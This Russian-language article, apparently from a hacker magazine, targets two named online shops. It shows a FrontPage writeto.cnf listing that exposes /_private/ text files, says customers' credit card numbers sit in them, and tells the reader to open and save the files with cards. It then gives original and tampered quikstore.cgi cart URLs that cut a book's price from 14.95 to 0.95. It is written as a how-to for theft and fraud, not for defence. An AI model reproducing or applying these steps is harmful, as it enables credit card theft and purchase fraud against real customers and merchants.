• Партнер

  • Разбираем дальше уязвимости систем электронной
    коммерции. Начнем со сладкого, с сс. Незадачливым администраторам интернет-магазинов уже давно следовало бы понять,
    что файлам хранящим критическую информацию (пароли, номера кредитных карт и
    т.д.) совсем не место в открытых для всеобщего просмотра веб-директориях, даже
    если об этих файлах никто кроме самого админа не знает.
    Примером такого головотяпства является www.swimmingcoach.org,
    администратор которого хранит данные о кредитных карточках ничего не
    подозревающих своих клиентов в текстовых файлах директории /_private/, в полной
    уверенности в том что о их существовании знает только он один. Так бы и было бы,
    если бы не всеми любимый Microsoft, со своим величайшим творением всех времен и
    народов - FrontPage, который сыграл в этом случае злую шутку. Ее смысл в том,
    что в некоторых файлах FrontPage хранит информацию о всех файлах веб-сервера, и
    что самое главное - файлах в которые выводятся и сохраняются результаты
    обработки данных. Одним из таких файлов является writeto.cnf, расположенный как
    правило в http://www.xxx.org/_vti_pvt/writeto.cnf. Вот какую информацию он предоставляет
    (пример скачан с сервера www.swimmingcoach.org, менно
    скачан, в браузере ты его не откроешь):

    _private/sic7result.txt: collegesTiJimming/sicS.htm fpdb:global.asa
    collegesTiJimming/sicS.asp salary.asp
    _private/Jobsvc_net.txt:jobservice/ job_net_questions.htm
    _private/audio_sales.txt: worldclinic/ASCA99/asca99_audio.htm
    _private/survey.txt:jobservice/salary.htm _private/Mc2000_registration. txt:
    Tijorldclinic/asca2000/asca2000_packets . htm
    _private/form_results.txt: jobservice/02salary.htm
    _private/article_results.txt: ALTST/past_articles/altst_4.htm ALTST/past_artide;
    pbsurvey.txt:water_depth_rule_ questionnaire.asp
    _private/cert_up.txt:forms/ certupgrade.htm
    _private/Mcreg2002_results.txt: worldclinic/ASCA2002/registration2.htm worldclin:
    _private/emembers.txt:articles/9903/ 9903-4.htm articles/9903/9903-5.htm
    article;j _private/jobsvc_net.txt: jobservice/job_net_questions.htm
    _private/certificaion_orders.txt: ASCA_Catalog/certification_0rder.htm
    _private/ameridome_leads.txt: ameridome/ordering.htm
    _private/feedbackl.txt:forms/feedback.htm
    _private/bkcatalog.txt:ASCA_Catalog/ catalog.htm ASCA_Catalog/images/catalog.htm
    _private/wc2000_Registration.txt: worldclinic/ ASCA2000/asca2000_packets.htm
    _private/sicSresult.txt:sicS/default.htm
    _private/sescc_reg.txt:forms/ STiJscc_reg.htm
    _private/chevron.txt:forms/ chevform.htm
    _private/sicord.txt:ASCA_ Catalog/sicord.htm
    _private/samonth.txt:forms/samonth.htm
    _private/altst_jоin.txt:ALTST/ ALTST_Join.htm learning_center:global.asa
    SurvivalKIT:survivalkit.asp

    Как ты видишь, результаты выводятся в
    текстовые файлы emembers.txt, survey.txt, sicSresult.txt
    лежащие в директории /_private/. Остается всего
    лишь открыть их в браузере и сохранить те, в
    которых лежат кредитки. Кроме этого, ту
    же  информацию можно получить и из
    другого файла на этом сервере author.log,
    расположенного в директории /_vti_log/. Он
    большой, так что придется запастись
    терпением.

    Следующим сайтом, который подвергнется
    нашему разбору, будет www.maledicta.com.
    В одной из прошлых статей мы говорили о
    манипуляции ценой в торговых тележках.
    www.maledicta.com дает нам еще один пример такого
    действия. Скрипт тележки quikstore.cgi (в прошлом
    бажный) в данном случае обрабатывает
    запросы методом POST, так что для изменения
    цены товара придется воспользоваться
    утилитой Achilles, скачать которую ты можешь с
    нашего сайта lwb57.webmen.ru.
    С ее помощью ты увидишь строку запроса вот
    такого вида:

    item-BEQUGODU%7C14.95%7CEquinox+of+the+ Gods%7CNA%7CNA=1&store_type=html&page=
    crowley.html&add_to_cart.x=45&add_to_cart.y=14

    конечно в том случае если выберешь книгу
    Алистера Кроули (Сrowley), на мой взгляд
    единственного мистика, достойного
    прочтения.

    Как ты наверное уже успел заметить, цена
    товара передается в строке запроса -
    "14.95", с помощью Achilles ты можешь теперь
    ее изменить и передать серверу. А можешь
    просто передать запрос в строке браузера.
    Так выглядит изначальный запрос:

    http://www.maledicta.com/cgi-bin/quikstore.cgi?item-
    BEQUGODU%7C14.95%7CEquinox+of+the+Gods% 7CNA%7CNA=1&store_type=html&page=crowley.
    html&add_to_cart.x=45&add_to_cart.y=14

    А так модифицированный:

    http://www.maledicta.com/cgi-bin/quikstore.cgi?item-
    BEQUGODU%7C0.95%7CEquinox+of+the+Gods% 7CNA%7CNA=1&store_type=html&page=crowley.
    html&add_to_cart.x=45&add_to_cart.y=14

    Приятных чтений на ночь ;-).

    Eat The Rich!

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии